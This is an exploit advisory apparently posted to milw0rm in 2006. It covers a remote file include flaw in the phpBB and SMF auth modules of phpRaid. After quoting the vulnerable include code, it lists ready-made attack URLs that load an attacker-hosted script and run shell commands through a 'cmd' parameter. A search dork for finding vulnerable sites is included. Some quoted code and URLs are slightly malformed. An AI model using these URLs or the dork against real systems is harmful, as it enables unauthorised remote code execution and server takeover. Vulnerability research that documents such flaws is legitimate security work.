# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB/SMF] :}
# "Sosyalizm'de ısrar insan olmakta ısrardır" Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Version : phpRaid v2.9.5, v3.0.b1, v3.0.b2, v3.0.b3
# Risk : High
# Class : Remote
# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D
# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)
---------------------------------------------------------------------
# cmd shell example:
# cmd shell variable: ($_GET[cmd]);

Vulnerable code — first, the phpBB integration :)

// define our auth type
define("AUTH","phpbb");
// database connection
global $user_group_table;
$user_group_table = $phpbb_prefix . "user_group";
// setup phpBB user integration
define('IN_PHPBB', true);
// set this as the path to your phpBB installation
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);

The include path is built from $phpbb_root_path, which this code never initialises before use; with PHP's register_globals enabled, a request parameter of the same name supplies it, which is what the URLs below rely on (the SMF module has the same flaw with $smf_root_path).
-----------------------------------------------------------------
http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id
http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a

# SMF #

// includes
include($smf_root_path= . 'SSI.php');
-----------------------------------------------------------------------
http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id
http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a

# milw0rm.com [2006-05-09]